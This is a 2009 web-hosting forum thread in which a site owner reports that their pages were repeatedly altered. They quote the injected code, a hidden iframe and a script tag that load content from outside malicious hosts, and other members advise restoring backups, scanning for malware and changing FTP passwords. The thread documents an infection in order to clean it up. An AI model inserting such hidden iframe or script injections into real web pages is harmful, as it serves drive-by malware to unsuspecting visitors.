1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

horrible virus

Discussion in 'Site & Server Administration' started by Vebtools, Oct 15, 2009.

My website working fine from last 10 years but from 2 days there is something wrong :-s my all files edit by some one and entred the following code

<body style="text-align: center"><div style="display:none">dnmukleaujsivpctwdcyfwtwojuynts<iframe width=847 height=240 src="http://icq-tel.ru:8080/index.php" ></iframe></div>
    Code (markup):
    <script src=http://anydisk.anyprinting.com/webfolder/index.php ></script>
    Code (markup):

i removed this code from every where.. my web work fine but after few mints the same issue some one edit all files

my hosting providers says every thing fine there

let me know what should i do now

Vebtools, Oct 15, 2009 IP
  2. SecureCP

SecureCP Guest

Best Answers:
    upload a clean backups, clean your local computer of malware and viruses, and change your ftp passwords. It will work wonders.

SecureCP, Oct 15, 2009 IP
  3. Nerv

Nerv Active Member

Best Answers:
    This thing probably got on your website by your ftp program. Clean up your computer and make sure you do not save your ftp password in your ftp program.

Nerv, Oct 15, 2009 IP
  4. redone975

redone975 Peon

Best Answers:
    I'm going through the process of falling the above directions. I've pulled down altered files.

Right now, I'm looking for software to sweep my computer. What types of applications should I use? Specifically, which applications do you suggest?

Am curious, how does this virus/hacking work? I'm concerned if they're accessing my FTP client (Transmit), are they accessing my computer too?

Thanks in advance for any help/information.
    Mike

redone975, Oct 15, 2009 IP
  5. Vebtools

Vebtools Well-Known Member

Best Answers:
    i deleed all my data from server and then restore one week onld data.. after that i have scanned my computer with AVAST antivirus.. now web working fine but i am affaired to upload file or not.. :-s i did i know that virus is removed now?... if there any software to find the spesific words from the whole web

Vebtools, Oct 15, 2009 IP
  6. SecureCP

SecureCP Guest

Best Answers:
    Don't forget to change your passwords. A script can be written to remove all these.

SecureCP, Oct 16, 2009 IP